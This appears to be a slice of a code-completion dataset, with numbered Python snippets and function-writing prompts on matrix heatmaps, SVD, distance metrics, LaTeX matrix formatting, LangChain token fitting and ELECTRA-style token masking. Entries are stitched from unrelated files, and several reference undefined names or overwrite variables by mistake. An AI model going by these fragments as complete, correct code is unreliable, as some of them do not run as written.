    xticklabels=False,
    yticklabels=False)
    if Equal_tags[1] == True:
        ax.set_aspect("equal")
    plt.title(Title_2)
    # Panel 3: '@' (matrix-multiply) separator.
    plt.sca(axs[3])
    plt.title('@')
    plt.axis('off')
    # Panel 4: second factor M3.
    plt.sca(axs[4])
    ax = sns.heatmap(M3,cmap='RdYlBu_r',
    vmin = Ranges[2][0],
    vmax = Ranges[2][1],
    cbar=False,
    xticklabels=False,
    yticklabels=False)
    if Equal_tags[2] == True:
        ax.set_aspect("equal")
    plt.title(Title_3)
def plot_four_figs(X,v_j,idx):
# Fig 1: X@v_j = z_j
z_j = X@v_j
Titles = ['$X$',
'$v_' + str(idx) + '$',
'$z_' + str(idx) + '$']
Ranges = [[-2,11],
[-1,1],
[-2,11]]
Equal_tags = [False,True,False]
heatmap([X,v_j,z_j],Titles,Ranges,Equal_tags)
# Fig 2: z@v_j.T = X_j
X_j = z_j@v_j.T
Titles = ['$z_' + str(idx) + '$',
'$v_' + str(idx) + '^T$',
'$X_' + str(idx) + '$']
Ranges = [[-2,11],
[-1,1],
[-2,11]]
Equal_tags = [False,True,False]
heatmap([z_j,v_j.T,X_j],Titles,Ranges,Equal_tags)
# Fig 3: T_j = v_j@v_j.T
T_j = v_j@v_j.T
Titles = ['$v_' + str(idx) + '$',
'$v_' + str(idx) + '^T$',
'$T_' + str(idx) + '$']
Ranges = [[-1,1],
[-1,1],
[-1,1]]
Equal_tags = [True,True,True]
heatmap([v_j,v_j.T,T_j],Titles,Ranges,Equal_tags)
# Fig 4: X@T_j = X_j
T_j = X@T_j
Titles = ['$X$',
'$T_' + str(idx) + '$',
'$X_' + str(idx) + '$']
Ranges = [[-2,11],
[-1,1],
[-2,11]]
Equal_tags = [False,True,False]
heatmap([X,T_j,X_j],Titles,Ranges,Equal_tags) | null |
6,149 | import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
def plot_heatmap(x,title):
fig, ax = plt.subplots()
ax = sns.heatmap(x,
cmap='RdYlBu_r',
cbar_kws={"orientation": "horizontal"}, vmin=-1, vmax=1)
ax.set_aspect("equal")
plt.title(title) | null |
6,150 | import streamlit as st
import numpy as np
from plotly.subplots import make_subplots
import plotly.graph_objects as go
import plotly.express as px
The provided code snippet includes necessary dependencies for implementing the `bmatrix` function. Write a Python function `def bmatrix(a)` to solve the following problem:
Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string
Here is the function:
def bmatrix(a):
"""Returns a LaTeX bmatrix
:a: numpy array
:returns: LaTeX bmatrix as a string
"""
if len(a.shape) > 2:
raise ValueError('bmatrix can at most display two dimensions')
lines = str(a).replace('[', '').replace(']', '').splitlines()
rv = [r'\begin{bmatrix}']
rv += [' ' + ' & '.join(l.split()) + r'\\' for l in lines]
rv += [r'\end{bmatrix}']
return '\n'.join(rv) | Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string |
6,151 | import numpy as np
import matplotlib.pyplot as plt
plt.ylabel('$x_2$')
plt.xlabel('$x_1$')
plt.axis('scaled')
plt.show()
def draw_vector(vector,RBG):
array = np.array([[0, 0, vector[0], vector[1]]])
X, Y, U, V = zip(*array)
plt.quiver(X, Y, U, V,angles='xy', scale_units='xy',scale=1,color = RBG) | null |
6,153 | import streamlit as st
import numpy as np
import plotly.express as px
import pandas as pd
The provided code snippet includes necessary dependencies for implementing the `bmatrix` function. Write a Python function `def bmatrix(a)` to solve the following problem:
Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string
Here is the function:
def bmatrix(a):
"""Returns a LaTeX bmatrix
:a: numpy array
:returns: LaTeX bmatrix as a string
"""
if len(a.shape) > 2:
raise ValueError('bmatrix can at most display two dimensions')
lines = str(a).replace('[', '').replace(']', '').splitlines()
rv = [r'\begin{bmatrix}']
rv += [' ' + ' & '.join(l.split()) + r'\\' for l in lines]
rv += [r'\end{bmatrix}']
return '\n'.join(rv) | Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string |
6,154 | import numpy as np
import matplotlib.pyplot as plt
def visualize(X_circle,X_vec,title_txt):
fig, ax = plt.subplots()
plt.plot(X_circle[0,:], X_circle[1,:],'k',
linestyle = '--',
linewidth = 0.5)
plt.quiver(0,0,X_vec[0,0],X_vec[1,0],
angles='xy', scale_units='xy',scale=1,
color = [0, 0.4392, 0.7529])
plt.quiver(0,0,X_vec[0,1],X_vec[1,1],
angles='xy', scale_units='xy',scale=1,
color = [1,0,0])
plt.axvline(x=0, color= 'k', zorder=0)
plt.axhline(y=0, color= 'k', zorder=0)
plt.ylabel('$x_2$')
plt.xlabel('$x_1$')
ax.set_aspect(1)
ax.set_xlim([-2.5, 2.5])
ax.set_ylim([-2.5, 2.5])
ax.grid(linestyle='--', linewidth=0.25, color=[0.5,0.5,0.5])
ax.set_xticks(np.linspace(-2,2,5));
ax.set_yticks(np.linspace(-2,2,5));
plt.title(title_txt)
plt.show() | null |
6,155 | import plotly.graph_objects as go
import streamlit as st
import numpy as np
import plotly.express as px
import pandas as pd
import sympy
from sympy import *
The provided code snippet includes necessary dependencies for implementing the `bmatrix` function. Write a Python function `def bmatrix(a)` to solve the following problem:
Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string
Here is the function:
def bmatrix(a):
"""Returns a LaTeX bmatrix
:a: numpy array
:returns: LaTeX bmatrix as a string
"""
if len(a.shape) > 2:
raise ValueError('bmatrix can at most display two dimensions')
lines = str(a).replace('[', '').replace(']', '').splitlines()
rv = [r'\begin{bmatrix}']
rv += [' ' + ' & '.join(l.split()) + r'\\' for l in lines]
rv += [r'\end{bmatrix}']
return '\n'.join(rv) | Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string |
6,156 | import sympy
import numpy as np
import matplotlib.pyplot as plt
from numpy import linalg as L
xx1, xx2 = mesh_circ(0, 0, 1, 50)
def mesh_circ(c1, c2, r, num):
    """Polar mesh over a disc of radius r centred at (c1, c2).

    Returns two (num, num) arrays of Cartesian x / y coordinates, built
    from num evenly spaced angles in [0, 2*pi] and num radii in [0, r].
    """
    angles = np.linspace(0, 2 * np.pi, num)
    radii = np.linspace(0, r, num)
    ang_grid, rad_grid = np.meshgrid(angles, radii)
    # Polar -> Cartesian, shifted to the requested centre.
    return np.cos(ang_grid) * rad_grid + c1, np.sin(ang_grid) * rad_grid + c2
6,158 | import sympy
from sympy import Matrix, Transpose
import numpy as np
from sympy.functions import exp
import matplotlib.pyplot as plt
xx1, xx2 = mesh_circ(0, 0, 3, 20)
def mesh_circ(c1, c2, r, num):
    """Polar mesh over a disc of radius ~r centred at (c1, c2).

    Angles step by pi/num up to (and including) 2*pi; radii step by
    r/num and stop just short of r (np.arange excludes the endpoint).
    """
    step = np.pi / num
    angles = np.arange(0, 2 * np.pi + step, step)
    radii = np.arange(0, r, r / num)
    ang_grid, rad_grid = np.meshgrid(angles, radii)
    # Polar -> Cartesian, shifted to the requested centre.
    return np.cos(ang_grid) * rad_grid + c1, np.sin(ang_grid) * rad_grid + c2
6,159 | import numpy as np
import matplotlib.pyplot as plt
def visualize(X_circle,X_vec,title_txt):
    """Plot an (n, 2) circle outline and the two row vectors of X_vec.

    X_circle: (n, 2) array of circle coordinates (column 0 = x, column 1 = y).
    X_vec: (2, 2) array; each ROW is drawn as an arrow from the origin.
    title_txt: figure title. Shows the figure; returns None.
    """
    fig, ax = plt.subplots()
    # Dashed outline of the reference circle.
    plt.plot(X_circle[:,0], X_circle[:,1],'k',
             linestyle = '--',
             linewidth = 0.5)
    # First row vector (blue).
    plt.quiver(0,0,X_vec[0,0],X_vec[0,1],
              angles='xy', scale_units='xy',scale=1,
              color = [0, 0.4392, 0.7529])
    # Second row vector (red).
    plt.quiver(0,0,X_vec[1,0],X_vec[1,1],
              angles='xy', scale_units='xy',scale=1,
              color = [1,0,0])
    # Axes drawn through the origin, behind the data (zorder=0).
    plt.axvline(x=0, color= 'k', zorder=0)
    plt.axhline(y=0, color= 'k', zorder=0)
    plt.ylabel('$x_2$')
    plt.xlabel('$x_1$')
    ax.set_aspect(1)
    ax.set_xlim([-2.5, 2.5])
    ax.set_ylim([-2.5, 2.5])
    ax.grid(linestyle='--', linewidth=0.25, color=[0.5,0.5,0.5])
    ax.set_xticks(np.linspace(-2,2,5));
    ax.set_yticks(np.linspace(-2,2,5));
    plt.title(title_txt)
    plt.show()
6,160 | import numpy as np
from matplotlib import pyplot as plt
plt.rcParams['image.cmap'] = 'RdBu_r'
import seaborn as sns
def svd(X):
    """Full SVD of X with the singular values padded into a matrix.

    Returns (U, S, V) — note V, not V^T — each rounded for display.
    NOTE(review): PRECISION is read from module scope; confirm it is
    defined before this function is called.
    """
    full_matrices = True
    U, s, Vt = np.linalg.svd(X,full_matrices = full_matrices)
    # Put the vector singular values into a padded matrix
    if full_matrices:
        S = np.zeros(X.shape)
        np.fill_diagonal(S, s)
    else:
        S = np.diag(s)
    # Rounding for display
    return np.round(U, PRECISION), np.round(S, PRECISION), np.round(Vt.T, PRECISION)
np.random.seed(1)
all_max = 6
all_min = -6
fig, axs = plt.subplots(1, 3, figsize=(12, 3))
plt.sca(axs[0])
ax = sns.heatmap(U,cmap='RdBu_r',vmax = all_max,vmin = all_min,
cbar_kws={"orientation": "horizontal"})
ax.set_aspect("equal")
plt.title('$U$')
plt.sca(axs[1])
ax = sns.heatmap(U.T,cmap='RdBu_r',vmax = all_max,vmin = all_min,
cbar_kws={"orientation": "horizontal"})
ax.set_aspect("equal")
plt.title('$U^T$')
plt.sca(axs[2])
ax = sns.heatmap(U@U.T,cmap='RdBu_r',vmax = all_max,vmin = all_min,
cbar_kws={"orientation": "horizontal"})
ax.set_aspect("equal")
plt.title('$I$')
all_max = 6
all_min = -6
fig, axs = plt.subplots(1, 3, figsize=(12, 3))
plt.sca(axs[0])
ax = sns.heatmap(V,cmap='RdBu_r',vmax = all_max,vmin = all_min,
cbar_kws={"orientation": "horizontal"})
ax.set_aspect("equal")
plt.title('$V$')
plt.sca(axs[1])
ax = sns.heatmap(V.T,cmap='RdBu_r',vmax = all_max,vmin = all_min,
cbar_kws={"orientation": "horizontal"})
ax.set_aspect("equal")
plt.title('$V^T$')
plt.sca(axs[2])
ax = sns.heatmap(V@V.T,cmap='RdBu_r',vmax = all_max,vmin = all_min,
cbar_kws={"orientation": "horizontal"})
ax.set_aspect("equal")
plt.title('$I$')
fig, axs = plt.subplots(1, 4, figsize=(12, 3))
def visualize_svd(X,title_X,title_U,title_S,title_V, fig_height=5):
    """Heatmap X alongside its SVD factors U, S and V^T.

    Renders X = U @ S @ V^T as four heatmaps separated by '@' panels,
    all on one fixed colour scale. Returns (X, U, S, V), where U, S, V
    come from the module-level svd() helper (rounded for display).
    """
    # Run SVD, as defined above
    U, S, V = svd(X)
    all_ = np.r_[X.flatten(order='C'),U.flatten(order='C'),
                 S.flatten(order='C'),V.flatten(order='C')]
    # all_max = max(all_.max(),all_.min())
    # all_min = -max(all_.max(),all_.min())
    # Fixed colour range so the four panels are directly comparable.
    all_max = 6
    all_min = -6
    # Visualization
    fig, axs = plt.subplots(1, 7, figsize=(12, fig_height))
    plt.sca(axs[0])
    ax = sns.heatmap(X,cmap='RdBu_r',vmax = all_max,vmin = all_min,
                     cbar_kws={"orientation": "horizontal"})
    ax.set_aspect("equal")
    plt.title(title_X)
    # Text-only '@' separator panel.
    plt.sca(axs[1])
    plt.title('@')
    plt.axis('off')
    plt.sca(axs[2])
    ax = sns.heatmap(U,cmap='RdBu_r',vmax = all_max,vmin = all_min,
                     cbar_kws={"orientation": "horizontal"})
    ax.set_aspect("equal")
    plt.title(title_U)
    plt.sca(axs[3])
    plt.title('@')
    plt.axis('off')
    plt.sca(axs[4])
    ax = sns.heatmap(S,cmap='RdBu_r',vmax = all_max,vmin = all_min,
                     cbar_kws={"orientation": "horizontal"})
    ax.set_aspect("equal")
    plt.title(title_S)
    plt.sca(axs[5])
    plt.title('@')
    plt.axis('off')
    # svd() returns V, so transpose here to display V^T.
    plt.sca(axs[6])
    ax = sns.heatmap(V.T,cmap='RdBu_r',vmax = all_max,vmin = all_min,
                     cbar_kws={"orientation": "horizontal"})
    ax.set_aspect("equal")
    plt.title(title_V)
    return X, U, S, V
6,161 | import plotly.graph_objects as go
import streamlit as st
import numpy as np
import plotly.express as px
import pandas as pd
import sympy
from scipy.spatial import distance
def fcn_Minkowski(xx, yy, mu, p = 2, Chebychev = False):
    """Minkowski distance of order p from centre mu, evaluated pointwise.

    xx, yy: coordinate arrays; mu: (x, y) centre. With Chebychev=True
    the limiting L-infinity metric max(|dx|, |dy|) is used instead of p.
    """
    dx = np.abs(xx - mu[0])
    dy = np.abs(yy - mu[1])
    if Chebychev:
        return np.maximum(dx, dy)
    return (dx ** p + dy ** p) ** (1. / p)
6,162 | import plotly.graph_objects as go
import streamlit as st
import numpy as np
import plotly.express as px
import pandas as pd
import sympy
from scipy.spatial import distance
def fcn_mahal(xx, yy, mu, Sigma, standardized = False):
    """Pointwise Mahalanobis distance from mu under covariance Sigma.

    With standardized=True only the diagonal of Sigma is used, i.e. each
    axis is scaled independently and correlation is ignored.
    """
    if standardized:
        cov = np.diag(np.diag(Sigma))
    else:
        cov = Sigma
    cov_inv = np.linalg.inv(cov)
    points = np.stack((xx.flatten(), yy.flatten())).T
    centered = points - mu
    # Only the diagonal of the quadratic-form matrix is the per-point distance.
    dist = np.diag(np.sqrt(np.dot(np.dot(centered, cov_inv), centered.T)))
    return np.reshape(dist, xx.shape)
6,163 | import streamlit as st
import plotly.graph_objects as go
import sympy
import numpy as np
The provided code snippet includes necessary dependencies for implementing the `bmatrix` function. Write a Python function `def bmatrix(a)` to solve the following problem:
Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string
Here is the function:
def bmatrix(a):
    """Format a numpy array as a LaTeX bmatrix string.

    :a: numpy array (at most two-dimensional)
    :returns: LaTeX bmatrix as a string
    """
    if len(a.shape) > 2:
        raise ValueError('bmatrix can at most display two dimensions')
    # Strip numpy's brackets, then join each text line's entries with '&'.
    text = str(a).replace('[', '').replace(']', '')
    middle = [' ' + ' & '.join(row.split()) + r'\\' for row in text.splitlines()]
    return '\n'.join([r'\begin{bmatrix}', *middle, r'\end{bmatrix}'])
6,164 | import sympy
import numpy as np
import matplotlib.pyplot as plt
xx1, xx2 = mesh_circ(0, 0, 4, 20)
def mesh_circ(c1, c2, r, num):
    """Polar mesh over a disc of radius ~r centred at (c1, c2).

    Angle samples step by pi/num through 2*pi inclusive; radial samples
    step by r/num and exclude r itself (arange endpoint behaviour).
    """
    dtheta = np.pi / num
    theta_vals = np.arange(0, 2 * np.pi + dtheta, dtheta)
    radius_vals = np.arange(0, r, r / num)
    T, R = np.meshgrid(theta_vals, radius_vals)
    return np.cos(T) * R + c1, np.sin(T) * R + c2
6,165 | import numpy as np
def is_pos_def(A):
    """Return True iff A is symmetric positive definite.

    Symmetry is checked exactly; definiteness is checked by attempting a
    Cholesky factorization, which only succeeds for SPD matrices.
    """
    if not np.array_equal(A, A.T):
        return False
    try:
        np.linalg.cholesky(A)
    except np.linalg.LinAlgError:
        return False
    return True
6,166 | import numpy as np
from matplotlib import pyplot as plt
import seaborn as sns
PRECISION = 3
np.random.seed(1)
U, S, V = svd(X, full_matrices = True)
U, S, V = svd(X, full_matrices = False)
import copy
def svd(X,full_matrices):
    """SVD of X with the singular values placed in a matrix S.

    full_matrices: passed through to np.linalg.svd; when True, S is
    zero-padded to X.shape, otherwise S is the square diagonal matrix.
    Returns (U, S, V) — note V, not V^T — rounded for display.
    NOTE(review): PRECISION is read from module scope; confirm it is
    defined before first call.
    """
    U, s, Vt = np.linalg.svd(X,full_matrices = full_matrices)
    # Put the vector singular values into a padded matrix
    if full_matrices:
        S = np.zeros(X.shape)
        np.fill_diagonal(S, s)
    else:
        S = np.diag(s)
    # Rounding for display
    return np.round(U, PRECISION), np.round(S, PRECISION), np.round(Vt.T, PRECISION)
6,167 | from typing import Dict, List, Any, Union, Optional
from langchain import PromptTemplate, LLMChain
from langchain.schema import LLMResult, BaseOutputParser, Generation
from langchain.llms import OpenAI, BaseLLM
from langchain.prompts.few_shot import FewShotPromptTemplate
from langchain.chat_models import ChatOpenAI
def format_options(options: List[str]) -> str:
    """Join the option strings into a single newline-separated block."""
    lines = list(options)
    return "\n".join(lines)
6,168 | import sys
from io import StringIO
from typing import List, Optional, Dict, Tuple
from langchain.schema import LLMResult, BaseOutputParser
from pydantic.fields import Field
from pydantic.main import BaseModel
def get_n_tokens(input: str, model_name: str = 'gpt-3.5-turbo') -> int:
    """Count how many tokens `input` encodes to under `model_name`'s tokenizer.

    tiktoken is imported lazily so the dependency is only required when
    this function is actually called.
    """
    import tiktoken
    enc = tiktoken.encoding_for_model(model_name)
    res = enc.encode(input)
    return len(res)
def fit_context(text_elememts: List[str], max_tokens: int):
    """Return the longest prefix of elements whose cumulative token count
    (per get_n_tokens) stays within max_tokens.

    Iteration stops at the first element that would push the running
    total past the budget.
    """
    kept = []
    running_total = 0
    for item in text_elememts:
        running_total += get_n_tokens(item)
        if running_total > max_tokens:
            break
        kept.append(item)
    return kept
6,169 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
import configure_pretraining
from model import modeling
from model import tokenization
from pretrain import pretrain_data
The provided code snippet includes necessary dependencies for implementing the `gather_positions` function. Write a Python function `def gather_positions(sequence, positions)` to solve the following problem:
Gathers the vectors at the specific positions over a minibatch. Args: sequence: A [batch_size, seq_length] or [batch_size, seq_length, depth] tensor of values positions: A [batch_size, n_positions] tensor of indices Returns: A [batch_size, n_positions] or [batch_size, n_positions, depth] tensor of the values at the indices
Here is the function:
def gather_positions(sequence, positions):
  """Gathers the vectors at the specific positions over a minibatch.

  Args:
    sequence: A [batch_size, seq_length] or
        [batch_size, seq_length, depth] tensor of values
    positions: A [batch_size, n_positions] tensor of indices

  Returns: A [batch_size, n_positions] or
    [batch_size, n_positions, depth] tensor of the values at the indices
  """
  shape = modeling.get_shape_list(sequence, expected_rank=[2, 3])
  depth_dimension = (len(shape) == 3)
  if depth_dimension:
    B, L, D = shape
  else:
    # Rank-2 input: add a depth-1 axis so both cases share one code path.
    B, L = shape
    D = 1
    sequence = tf.expand_dims(sequence, -1)
  # Offset each example's positions so they index into the flattened batch.
  position_shift = tf.expand_dims(L * tf.range(B), -1)
  flat_positions = tf.reshape(positions + position_shift, [-1])
  flat_sequence = tf.reshape(sequence, [B * L, D])
  gathered = tf.gather(flat_sequence, flat_positions)
  if depth_dimension:
    return tf.reshape(gathered, [B, -1, D])
  else:
    return tf.reshape(gathered, [B, -1])
6,170 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
import configure_pretraining
from model import modeling
from model import tokenization
from pretrain import pretrain_data
def scatter_update(sequence, updates, positions):
  """Scatter-update a sequence.

  Args:
    sequence: A [batch_size, seq_len] or [batch_size, seq_len, depth] tensor
    updates: A tensor of size batch_size*seq_len(*depth)
    positions: A [batch_size, n_positions] tensor

  Returns: A tuple of two tensors. First is a [batch_size, seq_len] or
    [batch_size, seq_len, depth] tensor of "sequence" with elements at
    "positions" replaced by the values at "updates." Updates to index 0 are
    ignored. If there are duplicated positions the update is only applied once.
    Second is a [batch_size, seq_len] mask tensor of which inputs were updated.
  """
  shape = modeling.get_shape_list(sequence, expected_rank=[2, 3])
  depth_dimension = (len(shape) == 3)
  if depth_dimension:
    B, L, D = shape
  else:
    # Rank-2 input: add a depth-1 axis so both cases share one code path.
    B, L = shape
    D = 1
    sequence = tf.expand_dims(sequence, -1)
  N = modeling.get_shape_list(positions)[1]
  # Flatten the batch so positions index into a single [B*L, D] buffer.
  shift = tf.expand_dims(L * tf.range(B), -1)
  flat_positions = tf.reshape(positions + shift, [-1, 1])
  flat_updates = tf.reshape(updates, [-1, D])
  updates = tf.scatter_nd(flat_positions, flat_updates, [B * L, D])
  updates = tf.reshape(updates, [B, L, D])
  # Count how many updates landed on each position (scatter_nd sums).
  flat_updates_mask = tf.ones([B * N], tf.int32)
  updates_mask = tf.scatter_nd(flat_positions, flat_updates_mask, [B * L])
  updates_mask = tf.reshape(updates_mask, [B, L])
  # Position 0 acts as a "no-op" slot: updates targeting it are dropped.
  not_first_token = tf.concat([tf.zeros((B, 1), tf.int32),
                               tf.ones((B, L - 1), tf.int32)], -1)
  updates_mask *= not_first_token
  updates_mask_3d = tf.expand_dims(updates_mask, -1)
  # account for duplicate positions: scatter_nd summed them, so divide by
  # the multiplicity to apply each update exactly once.
  if sequence.dtype == tf.float32:
    updates_mask_3d = tf.cast(updates_mask_3d, tf.float32)
    updates /= tf.maximum(1.0, updates_mask_3d)
  else:
    assert sequence.dtype == tf.int32
    updates = tf.math.floordiv(updates, tf.maximum(1, updates_mask_3d))
  updates_mask = tf.minimum(updates_mask, 1)
  updates_mask_3d = tf.minimum(updates_mask_3d, 1)
  # Blend: keep original values where the mask is 0, updates where it is 1.
  updated_sequence = (((1 - updates_mask_3d) * sequence) +
                      (updates_mask_3d * updates))
  if not depth_dimension:
    updated_sequence = tf.squeeze(updated_sequence, -1)
  return updated_sequence, updates_mask
def _get_candidates_mask(inputs: pretrain_data.Inputs, vocab,
                         disallow_from_mask=None):
  """Returns a mask tensor of positions in the input that can be masked out."""
  # Never select the special tokens for masking.
  ignore_ids = [vocab["[SEP]"], vocab["[CLS]"], vocab["[MASK]"]]
  candidates_mask = tf.ones_like(inputs.input_ids, tf.bool)
  for ignore_id in ignore_ids:
    candidates_mask &= tf.not_equal(inputs.input_ids, ignore_id)
  # Padding positions (input_mask == 0) are also excluded.
  candidates_mask &= tf.cast(inputs.input_mask, tf.bool)
  if disallow_from_mask is not None:
    candidates_mask &= ~disallow_from_mask
  return candidates_mask
The provided code snippet includes necessary dependencies for implementing the `mask` function. Write a Python function `def mask(config: configure_pretraining.PretrainingConfig, inputs: pretrain_data.Inputs, mask_prob, proposal_distribution=1.0, disallow_from_mask=None, already_masked=None)` to solve the following problem:
Implementation of dynamic masking. The optional arguments aren't needed for BERT/ELECTRA and are from early experiments in "strategically" masking out tokens instead of uniformly at random. Args: config: configure_pretraining.PretrainingConfig inputs: pretrain_data.Inputs containing input input_ids/input_mask mask_prob: percent of tokens to mask proposal_distribution: for non-uniform masking can be a [B, L] tensor of scores for masking each position. disallow_from_mask: a boolean tensor of [B, L] of positions that should not be masked out already_masked: a boolean tensor of [B, N] of already masked-out tokens for multiple rounds of masking Returns: a pretrain_data.Inputs with masking added
Here is the function:
def mask(config: configure_pretraining.PretrainingConfig,
         inputs: pretrain_data.Inputs, mask_prob, proposal_distribution=1.0,
         disallow_from_mask=None, already_masked=None):
  """Implementation of dynamic masking. The optional arguments aren't needed for
  BERT/ELECTRA and are from early experiments in "strategically" masking out
  tokens instead of uniformly at random.

  Args:
    config: configure_pretraining.PretrainingConfig
    inputs: pretrain_data.Inputs containing input input_ids/input_mask
    mask_prob: percent of tokens to mask
    proposal_distribution: for non-uniform masking can be a [B, L] tensor
        of scores for masking each position.
    disallow_from_mask: a boolean tensor of [B, L] of positions that should
        not be masked out
    already_masked: a boolean tensor of [B, N] of already masked-out tokens
        for multiple rounds of masking

  Returns: a pretrain_data.Inputs with masking added
  """
  # Get the batch size, sequence length, and max masked-out tokens
  N = config.max_predictions_per_seq
  B, L = modeling.get_shape_list(inputs.input_ids)
  # Find indices where masking out a token is allowed
  vocab = tokenization.FullTokenizer(
      config.vocab_file, do_lower_case=config.do_lower_case).vocab
  candidates_mask = _get_candidates_mask(inputs, vocab, disallow_from_mask)
  # Set the number of tokens to mask out per example (at least 1, at most N)
  num_tokens = tf.cast(tf.reduce_sum(inputs.input_mask, -1), tf.float32)
  num_to_predict = tf.maximum(1, tf.minimum(
      N, tf.cast(tf.round(num_tokens * mask_prob), tf.int32)))
  masked_lm_weights = tf.cast(tf.sequence_mask(num_to_predict, N), tf.float32)
  if already_masked is not None:
    masked_lm_weights *= (1 - already_masked)
  # Get a probability of masking each position in the sequence
  candidate_mask_float = tf.cast(candidates_mask, tf.float32)
  sample_prob = (proposal_distribution * candidate_mask_float)
  sample_prob /= tf.reduce_sum(sample_prob, axis=-1, keepdims=True)
  # Sample the positions to mask out
  sample_prob = tf.stop_gradient(sample_prob)
  sample_logits = tf.log(sample_prob)
  masked_lm_positions = tf.random.categorical(
      sample_logits, N, dtype=tf.int32)
  # Zero out positions beyond num_to_predict (weight 0 -> position 0).
  masked_lm_positions *= tf.cast(masked_lm_weights, tf.int32)
  # Get the ids of the masked-out tokens
  shift = tf.expand_dims(L * tf.range(B), -1)
  flat_positions = tf.reshape(masked_lm_positions + shift, [-1, 1])
  masked_lm_ids = tf.gather_nd(tf.reshape(inputs.input_ids, [-1]),
                               flat_positions)
  masked_lm_ids = tf.reshape(masked_lm_ids, [B, -1])
  masked_lm_ids *= tf.cast(masked_lm_weights, tf.int32)
  # Update the input ids: with probability 0.85 a selected position is
  # replaced with [MASK]; otherwise (zeroed here) it keeps its token.
  replace_with_mask_positions = masked_lm_positions * tf.cast(
      tf.less(tf.random.uniform([B, N]), 0.85), tf.int32)
  inputs_ids, _ = scatter_update(
      inputs.input_ids, tf.fill([B, N], vocab["[MASK]"]),
      replace_with_mask_positions)
  return pretrain_data.get_updated_inputs(
      inputs,
      input_ids=tf.stop_gradient(inputs_ids),
      masked_lm_positions=masked_lm_positions,
      masked_lm_ids=masked_lm_ids,
      masked_lm_weights=masked_lm_weights
  )
6,171 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
import configure_pretraining
from model import modeling
from model import tokenization
from pretrain import pretrain_data
def scatter_update(sequence, updates, positions):
  """Scatter-update a sequence.

  Args:
    sequence: A [batch_size, seq_len] or [batch_size, seq_len, depth] tensor
    updates: A tensor of size batch_size*seq_len(*depth)
    positions: A [batch_size, n_positions] tensor

  Returns: A tuple of two tensors. First is a [batch_size, seq_len] or
    [batch_size, seq_len, depth] tensor of "sequence" with elements at
    "positions" replaced by the values at "updates." Updates to index 0 are
    ignored. If there are duplicated positions the update is only applied once.
    Second is a [batch_size, seq_len] mask tensor of which inputs were updated.
  """
  shape = modeling.get_shape_list(sequence, expected_rank=[2, 3])
  depth_dimension = (len(shape) == 3)
  if depth_dimension:
    B, L, D = shape
  else:
    # Rank-2 input: add a depth-1 axis so both cases share one code path.
    B, L = shape
    D = 1
    sequence = tf.expand_dims(sequence, -1)
  N = modeling.get_shape_list(positions)[1]
  # Flatten the batch so positions index into a single [B*L, D] buffer.
  shift = tf.expand_dims(L * tf.range(B), -1)
  flat_positions = tf.reshape(positions + shift, [-1, 1])
  flat_updates = tf.reshape(updates, [-1, D])
  updates = tf.scatter_nd(flat_positions, flat_updates, [B * L, D])
  updates = tf.reshape(updates, [B, L, D])
  # Count how many updates landed on each position (scatter_nd sums).
  flat_updates_mask = tf.ones([B * N], tf.int32)
  updates_mask = tf.scatter_nd(flat_positions, flat_updates_mask, [B * L])
  updates_mask = tf.reshape(updates_mask, [B, L])
  # Position 0 acts as a "no-op" slot: updates targeting it are dropped.
  not_first_token = tf.concat([tf.zeros((B, 1), tf.int32),
                               tf.ones((B, L - 1), tf.int32)], -1)
  updates_mask *= not_first_token
  updates_mask_3d = tf.expand_dims(updates_mask, -1)
  # account for duplicate positions: scatter_nd summed them, so divide by
  # the multiplicity to apply each update exactly once.
  if sequence.dtype == tf.float32:
    updates_mask_3d = tf.cast(updates_mask_3d, tf.float32)
    updates /= tf.maximum(1.0, updates_mask_3d)
  else:
    assert sequence.dtype == tf.int32
    updates = tf.math.floordiv(updates, tf.maximum(1, updates_mask_3d))
  updates_mask = tf.minimum(updates_mask, 1)
  updates_mask_3d = tf.minimum(updates_mask_3d, 1)
  # Blend: keep original values where the mask is 0, updates where it is 1.
  updated_sequence = (((1 - updates_mask_3d) * sequence) +
                      (updates_mask_3d * updates))
  if not depth_dimension:
    updated_sequence = tf.squeeze(updated_sequence, -1)
  return updated_sequence, updates_mask
def unmask(inputs: pretrain_data.Inputs):
  """Restore the original token ids at the masked-out positions.

  Inverse of masking: scatters masked_lm_ids back into input_ids at
  masked_lm_positions and returns the updated Inputs.
  """
  unmasked_input_ids, _ = scatter_update(
      inputs.input_ids, inputs.masked_lm_ids, inputs.masked_lm_positions)
  return pretrain_data.get_updated_inputs(inputs, input_ids=unmasked_input_ids)
6,172 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
import configure_pretraining
from model import modeling
from model import tokenization
from pretrain import pretrain_data
def sample_from_softmax(logits, disallow=None):
  """Draw one-hot samples from a softmax via the Gumbel-max trick.

  disallow: optional indicator tensor of ids to exclude; their logits are
  pushed down by 1000 so they are effectively never drawn.
  Returns a one-hot tensor over the trailing vocab dimension.
  """
  if disallow is not None:
    logits -= 1000.0 * disallow
  uniform_noise = tf.random.uniform(
      modeling.get_shape_list(logits), minval=0, maxval=1)
  # Gumbel(0, 1) noise; argmax(logits + gumbel) is a categorical sample.
  gumbel_noise = -tf.log(-tf.log(uniform_noise + 1e-9) + 1e-9)
  return tf.one_hot(tf.argmax(tf.nn.softmax(logits + gumbel_noise), -1,
                              output_type=tf.int32), logits.shape[-1])
6,173 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
import tensorflow.compat.v1 as tf
import configure_pretraining
from model import tokenization
from util import utils
Inputs = collections.namedtuple(
"Inputs", ["input_ids", "input_mask", "segment_ids", "masked_lm_positions",
"masked_lm_ids", "masked_lm_weights"])
ENDC = "\033[0m"
RED = COLORS[0]
